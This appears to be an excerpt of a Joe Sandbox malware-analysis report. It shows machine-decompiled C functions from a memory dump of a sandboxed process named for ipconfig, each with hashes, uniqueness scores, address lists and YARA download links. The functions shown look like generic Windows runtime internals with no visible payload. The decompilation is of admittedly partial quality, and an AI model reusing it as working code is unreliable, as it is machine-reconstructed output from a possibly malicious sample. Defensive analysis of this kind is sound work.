              • Opcode Fuzzy Hash: 3bb6625b54479edd0336bc316a4d7b65765757384481d863d8d84ce4284b5580
              • Instruction Fuzzy Hash: 6E319175A54249EFD704CF58C940F9AB7E8FB08314F18926AFA04CB341D631ED91CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02ECBC2C Relevance: .1, Instructions: 88COMMON
              Download Yara Rule
              C-Code - Quality: 67%
              			E02ECBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x2f86100; // 0xf
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E02EB2280(0xd, 0xed9f1a0);
				_t41 =  *0x2f860f8; // 0x0
				if(_t41 != 0) {
					 *0x2f860f8 =  *_t41;
					 *0x2f860fc =  *0x2f860fc + 0xffff;
				}
				E02EAFFB0(_t41, 0x800, 0xed9f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x2f860f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L02EB4620(0x2f86100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x2f86100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










              0x02ecbc36
              0x02ecbc42
              0x02ecbc45
              0x02ecbc4a
              0x02ecbd35
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x02ecbc50
              0x02ecbc50
              0x02ecbc58
              0x02ecbc5a
              0x02ecbc60
              0x00000000
              0x00000000
              0x02f0a4f2
              0x02f0a4f6
              0x00000000
              0x00000000
              0x00000000
              0x02f0a4fc
              0x02ecbc79
              0x02ecbc7e
              0x02ecbc86
              0x02ecbd16
              0x02ecbd20
              0x02ecbd20
              0x02ecbc8d
              0x02ecbc94
              0x02ecbcbd
              0x02ecbcca
              0x02ecbccb
              0x02ecbccc
              0x02ecbccd
              0x02ecbcce
              0x02ecbcd4
              0x02ecbcea
              0x02ecbcee
              0x02ecbcf2
              0x02ecbd00
              0x02ecbd04
              0x00000000
              0x02ecbc96
              0x02ecbcab
              0x02ecbcaf
              0x02ecbd2c
              0x02ecbd2c
              0x02ecbd09
              0x00000000
              0x02ecbd09
              0x02ecbcb1
              0x02ecbcb5
              0x02ecbcbb
              0x00000000
              0x00000000
              0x00000000
              0x02ecbcbb

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b66117e14cdccdd793293f27ce9b662b645660e5fe38027bd4e01d56920e6ef2
              • Instruction ID: 395c4969ef6c5434471a3ab26dc598dd60b95259b3a0d28cf899e6b84fa15d2b
              • Opcode Fuzzy Hash: b66117e14cdccdd793293f27ce9b662b645660e5fe38027bd4e01d56920e6ef2
              • Instruction Fuzzy Hash: 2331FF36A80A199BCB01DF98D981BB6B7A8EF09758F21947CED05DB241E774D906CB80
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02E99100 Relevance: .1, Instructions: 87COMMON
              Download Yara Rule
              C-Code - Quality: 76%
              			E02E99100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x2f6f6e8);
				E02EED0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E02F688F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E02EED130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x2f886c0; // 0x4007b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x2f886b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E02EB2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E02F688F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E02EDAFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x2f8b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x2f884c0;
										if(_t69 >=  *0x2f884c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E02F69063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E02E9922A(_t82);
							_t53 = E02EB7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E02F68B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x2f886c0; // 0x4007b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x2f886b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x2f886bc;
										_t72 = 0x2f886b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E02E99240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x2f886c4;
									_t72 = 0x2f886c0;
									L18:
									E02EC9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















              0x02e99100
              0x02e99100
              0x02e99100
              0x02e99100
              0x02e99102
              0x02e99107
              0x02e9910c
              0x02e99110
              0x02e99115
              0x02e99136
              0x02e99143
              0x02ef37e4
              0x02ef37e4
              0x02e99149
              0x02e9914e
              0x02e9914e
              0x02e99117
              0x02e9911d
              0x00000000
              0x00000000
              0x02e9911f
              0x02e99125
              0x00000000
              0x02e99151
              0x02e99158
              0x02e9915d
              0x02e99161
              0x02e99168
              0x02ef3715
              0x00000000
              0x02e9916e
              0x02e9916e
              0x02e99175
              0x02e99177
              0x02e9917e
              0x02e9917f
              0x02e99182
              0x02e99182
              0x02e99187
              0x02e99187
              0x02e9918a
              0x02e9918d
              0x02e9918f
              0x02e99192
              0x02e99195
              0x02e99198
              0x02e99198
              0x02e99198
              0x02e9919a
              0x00000000
              0x00000000
              0x02ef371f
              0x02ef3721
              0x02ef3727
              0x02ef372f
              0x02ef3733
              0x02ef3735
              0x02ef3738
              0x02ef373b
              0x02ef373d
              0x02ef3740
              0x00000000
              0x00000000
              0x02ef3746
              0x02ef3749
              0x00000000
              0x00000000
              0x02ef374f
              0x02ef3751
              0x00000000
              0x00000000
              0x02ef3757
              0x02ef3759
              0x02ef375c
              0x02ef375c
              0x02ef375e
              0x02ef375e
              0x02ef3761
              0x02ef3764
              0x00000000
              0x00000000
              0x02ef3766
              0x02ef3768
              0x02ef37a3
              0x02ef37a3
              0x02ef37a5
              0x02ef37a7
              0x02ef37ad
              0x02ef37b0
              0x02ef37b2
              0x02ef37bc
              0x02ef37c2
              0x02ef37c2
              0x02ef37b2
              0x02e99187
              0x02e99187
              0x02e9918a
              0x02e9918d
              0x02e9918f
              0x02e99192
              0x02e99195
              0x00000000
              0x02e99195
              0x00000000
              0x02e99187
              0x02ef376a
              0x02ef376a
              0x02ef376c
              0x02ef376c
              0x02ef376f
              0x02ef3775
              0x00000000
              0x00000000
              0x02ef3777
              0x02ef3779
              0x00000000
              0x00000000
              0x02ef3782
              0x02ef3787
              0x02ef3789
              0x02ef3790
              0x02ef3790
              0x02ef378b
              0x02ef378b
              0x02ef378b
              0x02ef3792
              0x02ef3795
              0x02ef3795
              0x02ef3798
              0x02ef3798
              0x02ef379b
              0x02ef379b
              0x02e991a3
              0x02e991a9
              0x02e991b0
              0x02e991b4
              0x02e991b4
              0x02e991bb
              0x02e991c0
              0x02e991c5
              0x02e991c7
              0x02ef37da
              0x02e991cd
              0x02e991cd
              0x02e991cd
              0x02e991d2
              0x02e991d5
              0x02e99239
              0x02e99239
              0x02e991d7
              0x02e991db
              0x02e991e1
              0x02e991e7
              0x02e991fd
              0x02e99203
              0x02e9921e
              0x02e99223
              0x00000000
              0x02e99223
              0x02e99205
              0x02e99208
              0x02e9920c
              0x02e99214
              0x02e99214
              0x02e991e9
              0x02e991e9
              0x02e991ee
              0x02e991f3
              0x02e991f3
              0x02e991f3
              0x02e991e7
              0x00000000
              0x02e991db
              0x02e99187
              0x02e99168

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f5641219af5d5a4373da0847434b1ea824ab7c5e487799383a7ab78f0b3ea2e9
              • Instruction ID: adde01f6001f0f41122d5d947f798514b014b99f192de4b9ae05c8c25724bc51
              • Opcode Fuzzy Hash: f5641219af5d5a4373da0847434b1ea824ab7c5e487799383a7ab78f0b3ea2e9
              • Instruction Fuzzy Hash: 4831C371A81285DFDF25DF69C488BADF7B2BB48398F19D14ED50567242C334A980CF61
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EC1DB5 Relevance: .1, Instructions: 87COMMON
              Download Yara Rule
              C-Code - Quality: 60%
              			E02EC1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E02EBF460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L02EB4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E02EBF460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












              0x02ec1dc2
              0x02ec1dc5
              0x02ec1dc7
              0x02ec1dcc
              0x02ec1dce
              0x02ec1dd6
              0x02ec1ddf
              0x02ec1de0
              0x02ec1de1
              0x02ec1de5
              0x02ec1de8
              0x02ec1def
              0x02ec1df0
              0x02ec1df6
              0x02ec1df7
              0x02ec1dfe
              0x02ec1e1a
              0x00000000
              0x00000000
              0x02ec1e0b
              0x02ec1e12
              0x02ec1e12
              0x02ec1e00
              0x02ec1e00
              0x02ec1e05
              0x02ec1e1e
              0x02ec1e23
              0x02f0570f
              0x02f05713
              0x00000000
              0x00000000
              0x02f05719
              0x02f05719
              0x02ec1e2c
              0x02ec1e2d
              0x02ec1e2e
              0x02ec1e2f
              0x02ec1e31
              0x02ec1e32
              0x02ec1e35
              0x02ec1e3d
              0x02f05723
              0x02f0573d
              0x02f0573d
              0x00000000
              0x02f05723
              0x02ec1e49
              0x02ec1e4e
              0x02ec1e4e
              0x02ec1e09
              0x00000000

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
              • Instruction ID: d494b24169c3a8beaf4bf4b927aaec308672556b74b6f32c66e4f3106c4e9c85
              • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
              • Instruction Fuzzy Hash: F7218072680118EFC721CF99CD80EABBBB9EF85644F219059F905DB251D670AD02DB90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EB0050 Relevance: .1, Instructions: 81COMMON
              Download Yara Rule
              C-Code - Quality: 53%
              			E02EB0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x2f8d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E02EC9ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E02EDB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E02F68A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E02EC9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x2f8b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















              0x02eb0055
              0x02eb005d
              0x02eb0062
              0x02eb006c
              0x02eb006f
              0x02eb0074
              0x02eb007a
              0x02eb007a
              0x02eb0080
              0x02eb0080
              0x02eb0087
              0x02eb008d
              0x02eb008f
              0x02eb0093
              0x02eb0095
              0x02eb009b
              0x02eb00f8
              0x02eb00fb
              0x02eb00fc
              0x02eb00ff
              0x02eb0108
              0x02eb0108
              0x02eb00a2
              0x02eb00a6
              0x02eb00b3
              0x02eb00bc
              0x02eb00c5
              0x02eb00ca
              0x02efc01e
              0x00000000
              0x00000000
              0x02efc02d
              0x02eb00d5
              0x02eb00d9
              0x02efc03d
              0x02efc046
              0x02efc046
              0x02eb00df
              0x02eb00e2
              0x02eb00ea
              0x02eb00ef
              0x02eb00f2
              0x02eb00f6
              0x02eb0111
              0x02eb0117
              0x02eb0117
              0x00000000
              0x02eb00f6
              0x02eb00d0
              0x02eb00d0
              0x00000000

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8efe8456ee2232848eed181757258945e43c314ff5afa0978a2234f82c0c0e14
              • Instruction ID: 705d65740242a5b33aa2460fab4e430ac62e2c30290ea1158d055e02a1778ab5
              • Opcode Fuzzy Hash: 8efe8456ee2232848eed181757258945e43c314ff5afa0978a2234f82c0c0e14
              • Instruction Fuzzy Hash: 2A318F31641B04CFD726CF28C944BA7B3E5FF88718F24996DE59687A90EB75B802CB50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F16C0A Relevance: .1, Instructions: 79COMMON
              Download Yara Rule
              C-Code - Quality: 77%
              			E02F16C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E02EB7D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x2f87b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L02EB4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E02EDF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E02EB7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E02ED9AE0();
						_t23 = L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












              0x02f16c0a
              0x02f16c0f
              0x02f16c10
              0x02f16c13
              0x02f16c15
              0x02f16c19
              0x02f16c1c
              0x02f16c21
              0x02f16c28
              0x02f16c3a
              0x02f16c2a
              0x02f16c33
              0x02f16c33
              0x02f16c3f
              0x02f16c48
              0x02f16c4d
              0x02f16c60
              0x02f16c65
              0x02f16c69
              0x02f16c73
              0x02f16c79
              0x02f16c7f
              0x02f16c86
              0x02f16c90
              0x02f16c94
              0x02f16ca6
              0x02f16cb2
              0x02f16cbd
              0x02f16cbd
              0x02f16cc3
              0x02f16cc7
              0x02f16ccb
              0x02f16cd0
              0x02f16cd1
              0x02f16ce2
              0x02f16ce2
              0x02f16c69
              0x02f16ced

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b4ff1f79358a19d4ba1fa664d124636908abf1cf237c594941c162d43e054773
              • Instruction ID: c43bf00f6f98ede88cc7572c0287e82eb243a41f4e5a5a1903a4b29384d8c6c6
              • Opcode Fuzzy Hash: b4ff1f79358a19d4ba1fa664d124636908abf1cf237c594941c162d43e054773
              • Instruction Fuzzy Hash: 61217A72A40644ABC716DB68D880F6AB7A8FF48784F144069F905DBB91D734ED11CBA4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02ED90AF Relevance: .1, Instructions: 76COMMON
              Download Yara Rule
              C-Code - Quality: 82%
              			E02ED90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E02EED4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E02ECE5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L02EB4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E02EDF3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E02ECA2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























              0x02ed90af
              0x02ed90b8
              0x02ed90bb
              0x02ed90bf
              0x02ed90c2
              0x02ed90c2
              0x02ed90c8
              0x02ed90cb
              0x02ed90cd
              0x02f114d7
              0x02f114eb
              0x02f114eb
              0x00000000
              0x02f114eb
              0x02f114db
              0x02f114e6
              0x00000000
              0x02f114f2
              0x02f114e8
              0x00000000
              0x02f114e8
              0x02ed90d8
              0x02ed90da
              0x02ed90dd
              0x02ed90e5
              0x00000000
              0x02ed9139
              0x02ed90fa
              0x02ed90fe
              0x02ed9142
              0x00000000
              0x02ed9142
              0x02ed9104
              0x02ed9107
              0x02ed910b
              0x02ed9110
              0x02ed9118
              0x02ed9147
              0x02ed9148
              0x02ed914f
              0x02ed9150
              0x02ed9151
              0x02ed9152
              0x02ed9156
              0x02ed915d
              0x02ed9160
              0x02ed9168
              0x02ed916c
              0x02ed91bc
              0x02ed91be
              0x00000000
              0x02ed91be
              0x02ed916e
              0x02ed9173
              0x02ed9176
              0x00000000
              0x00000000
              0x02ed917c
              0x02ed9180
              0x02ed91b5
              0x00000000
              0x02ed91b5
              0x02ed9182
              0x02ed9185
              0x02ed9189
              0x00000000
              0x00000000
              0x02ed918e
              0x02ed9190
              0x02ed9198
              0x00000000
              0x00000000
              0x02ed91a0
              0x00000000
              0x02ed91ad
              0x02ed91ad
              0x02ed91b0
              0x02ed91b1
              0x00000000
              0x02ed9185
              0x02ed911a
              0x02ed911c
              0x02ed911f
              0x02ed9125
              0x02ed9127
              0x00000000

              Memory Dump Source
